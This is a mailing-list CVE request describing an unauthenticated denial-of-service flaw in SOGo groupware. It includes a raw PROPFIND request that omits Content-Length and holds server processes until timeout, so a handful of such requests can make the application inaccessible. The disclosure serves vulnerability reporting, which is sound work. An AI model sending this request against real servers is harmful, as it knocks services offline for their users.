CVE Request for sogO Open Source Groupware (www.sogo.nu)

[Stefan Castille <stefan.castille () bonnierdigital se>]

Hej,

I would like to request a CVE for a DoS in sogo. While it does not crash
the system, it does make it very easy to conduct a DoS against the
application.


Software: sogo
Vendor: Inverse
Site: www.sogo.nu
Previously requested: No
Type: DoS
Description: Due to incorrect handling of certain PROPFIND requests, the
site is vulnerable to a DoS.

-----------------------------------
PROPFIND /SOGo/dav/ HTTP/1.1
Host: <hostname>
Connection: keep-alive
Content-Length: 0


------------------------------------

will return almost immediately

-----------------------------------
PROPFIND /SOGo/dav/ HTTP/1.1
Host: myhost
Connection: keep-alive


-----------------------------------
without the Content-Length will keep the child process occupied until it
times out. Default value one minute. With only <#processes> requests per
<timeout> the application can be rendered inaccessible.

No authentication/valid account is required. The bug has been reported
at www.sogo.nu/bugs as a private bugreport, but labelled won't fix as it
is 'how servers work' and that tuning the timeout will help. I disagree
and would like to get a CVE for it.


with kind regards,
Stefan